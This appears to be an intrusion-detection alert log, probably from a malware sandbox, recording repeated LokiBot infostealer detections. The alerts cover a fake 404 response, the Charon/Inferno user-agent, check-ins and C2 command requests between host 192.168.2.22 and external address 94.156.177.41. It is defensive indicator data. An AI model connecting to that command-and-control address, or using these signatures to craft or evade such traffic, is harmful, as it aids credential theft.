2024-11-20T10:11:48.768499+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49184	TCP
2024-11-20T10:11:48.916450+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:48.916450+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:48.916450+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.780927+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.780927+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.786314+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49185	TCP
2024-11-20T10:11:49.934221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:49.934221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:49.934221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.661713+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.661713+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.669657+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49186	TCP
2024-11-20T10:11:50.825355+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:50.825355+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:50.825355+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.563928+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.563928+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.578703+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49187	TCP
2024-11-20T10:11:51.974265+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:51.974265+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:51.974265+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.677319+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.677319+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.682271+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49188	TCP
2024-11-20T10:11:52.833476+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:52.833476+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:52.833476+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.596271+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.596271+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.605545+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49189	TCP
2024-11-20T10:11:53.743942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:53.743942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:53.743942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.506581+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.506581+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.512561+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49190	TCP
2024-11-20T10:11:54.665755+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:54.665755+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:54.665755+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.397349+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.397349+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.402298+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49191	TCP
2024-11-20T10:11:55.543705+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:55.543705+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:55.543705+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.305736+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.305736+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.311347+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49192	TCP
2024-11-20T10:11:56.465409+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:56.465409+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:56.465409+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.196530+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.196530+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.204029+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49193	TCP
2024-11-20T10:11:57.354850+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:57.354850+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:57.354850+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.102470+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.102470+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.107727+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49194	TCP
2024-11-20T10:11:58.251851+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:58.251851+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:58.251851+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:58.990871+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:58.990871+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:58.995828+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49195	TCP
2024-11-20T10:11:59.153133+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:11:59.153133+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:11:59.153133+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:11:59.906870+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:11:59.906870+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:11:59.914415+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49196	TCP
2024-11-20T10:12:00.062553+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:00.062553+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:00.062553+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:00.919609+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:00.919609+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:00.924468+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49197	TCP
2024-11-20T10:12:01.086240+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:01.086240+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:01.086240+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:01.961464+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:01.961464+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:01.969084+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49198	TCP
2024-11-20T10:12:02.135572+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:02.135572+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:02.135572+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.002110+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.002110+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.007930+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49199	TCP
2024-11-20T10:12:03.154171+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:03.154171+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:03.154171+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.030990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.030990+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.035992+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49200	TCP
2024-11-20T10:12:04.183469+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:04.183469+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:04.183469+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.064968+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.064968+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.070422+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49201	TCP
2024-11-20T10:12:05.221730+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:05.221730+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:05.221730+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:05.957357+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:05.957357+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:05.963806+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49202	TCP
2024-11-20T10:12:06.101870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.101870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.101870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.846240+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.846240+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.854208+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49203	TCP
2024-11-20T10:12:06.992362+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:06.992362+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:06.992362+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.734502+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.734502+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.741514+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49204	TCP
2024-11-20T10:12:07.878233+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:07.878233+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:07.878233+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.610456+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.610456+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.615371+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49205	TCP
2024-11-20T10:12:08.762365+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:08.762365+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:08.762365+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.486250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.486250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.492422+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49206	TCP
2024-11-20T10:12:09.636983+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:09.636983+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:09.636983+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.489003+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.489003+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.494091+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49207	TCP
2024-11-20T10:12:10.655009+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:10.655009+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:10.655009+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.403681+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.403681+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.411925+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49208	TCP
2024-11-20T10:12:11.548573+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:11.548573+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:11.548573+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.422371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.422371+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.427402+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49209	TCP
2024-11-20T10:12:12.583479+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:12.583479+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:12.583479+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.483743+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.483743+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.489277+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49210	TCP
2024-11-20T10:12:13.635352+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:13.635352+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:13.635352+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.380737+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.380737+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.386020+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49211	TCP
2024-11-20T10:12:14.668490+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:14.668490+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:14.668490+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.543328+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.543328+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.548693+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49212	TCP
2024-11-20T10:12:15.692786+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:15.692786+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:15.692786+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.542989+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.542989+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.548175+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49213	TCP
2024-11-20T10:12:16.709953+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:16.709953+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:16.709953+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.576303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.576303+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.581516+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49214	TCP
2024-11-20T10:12:17.740346+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:17.740346+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:17.740346+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:18.599605+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:18.599605+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:18.607117+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49215	TCP
2024-11-20T10:12:19.475029+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:19.475029+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:19.475029+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.249895+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.249895+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.254986+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49216	TCP
2024-11-20T10:12:20.388739+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:20.388739+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:20.388739+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.119620+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.119620+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.124909+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49217	TCP
2024-11-20T10:12:21.265845+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:21.265845+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:21.265845+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:22.167325+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49218	94.156.177.41	80	TCP
